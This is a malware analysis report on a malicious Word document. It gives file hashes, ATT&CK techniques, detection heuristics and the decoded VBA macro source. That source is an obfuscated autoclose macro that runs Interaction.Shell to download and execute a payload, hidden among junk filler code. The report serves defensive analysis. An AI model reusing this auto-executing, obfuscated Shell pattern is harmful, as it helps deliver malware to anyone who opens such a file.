Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0836a1c11fef76fd…

MALICIOUS

Office (OLE)

95.2 KB Created: 2018-12-19 16:27:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: 8af6e86b083859921725a86f814f8e7c SHA-1: 91a11767e74559111c8bdc34562f4e3e77628c69 SHA-256: 0836a1c11fef76fd1729c5ba84871e3a52a2646f020a37e29a28bb3be9172911
250 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The 'autoclose' macro triggers a Shell() call, which is highly suspicious and indicative of malware execution. The script attempts to download and execute a payload, as evidenced by the Shell() call and the 'Doc.Downloader' ClamAV detection. The specific payload or destination is obfuscated within the script.

Heuristics 8

  • ClamAV: Doc.Downloader.Generic-6789372-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6789372-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
          End Select
S67943 = Array(Q494600809, v49713, j476169, Interaction.Shell(CVar("" + S2212509 + s131557 + w38655703 + R626178 + b39699628.TextBox1) + Y7118227 + j38152, 35 - 35), i86854)
   Select Case j903
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoclose()
A93977
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3857 bytes
SHA-256: a6bc010fbbfc41d20260c0c0f3ca65b3f48ce99b9b46c08537bf4c2344d4ee23
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "b39699628"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoclose()
A93977
End Sub

Attribute VB_Name = "r796538400108"
Function A93977()
On Error Resume Next
   Select Case l4106
         Case 182722759
 E100 = J6497
b015 = Rnd(w4278 - Round(k431) / 332908678 - Round(Z0979))
E3035 = V989
z0739 = Rnd(c406 * Tan(239407366))
         Case 126165365
j6379 = n8710
c801 = v798
      End Select
   Select Case R9856
         Case 274218981
 s095 = R231
v0577 = Rnd(R957 - Round(J5881) / 69701613 - Round(l8846))
H5293 = z5454
t9875 = Rnd(F2276 * Tan(17333469))
         Case 229287622
G464 = c485
C570 = W9059
      End Select
S67943 = Array(Q494600809, v49713, j476169, Interaction.Shell(CVar("" + S2212509 + s131557 + w38655703 + R626178 + b39699628.TextBox1) + Y7118227 + j38152, 35 - 35), i86854)
   Select Case j903
         Case 134579612
 i396 = k059
N998 = Rnd(c9216 - Round(I1229) / 260039581 - Round(v2683))
Y294 = p480
z9544 = Rnd(w929 * Tan(114411349))
         Case 167667808
n520 = d776
T3875 = P3224
      End Select
   Select Case z698
         Case 271356251
 f127 = C9037
O364 = Rnd(w5059 - Round(i949) / 295338709 - Round(j4956))
A2447 = d0550
r8847 = Rnd(r446 * Tan(149331870))
         Case 85010848
J233 = n7866
O690 = v6308
      End Select
   Select Case O783
         Case 324183500
 W231 = m392
z201 = Rnd(G0677 - Round(u8765) / 88034141 - Round(u3311))
P491 = k245
G858 = Rnd(I7373 * Tan(143913007))
         Case 179092980
i675 = w0101
o630 = w655
      End Select
   Select Case w7932
         Case 215674546
 n6956 = Z3897
T331 = Rnd(z963 - Round(C3177) / 198778011 - Round(K3065))
A471 = B357
b2587 = Rnd(N3171 * Tan(186124069))
         Case 225347770
r107 = i8090
o604 = A3475
      End Select
End Function


Attribute VB_Name = "W5827652012"

Attribute VB_Name = "s32425311"

Attribute VB_Name = "a2972487186"

Attribute VB_Name = "X0023386565019"

Attribute VB_Name = "E549476790736"

Attribute VB_Name = "S7403528890"

Attribute VB_Name = "i2579042858"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "M375162137"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "P07614713292770"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "w92920624"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "T4566761767"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.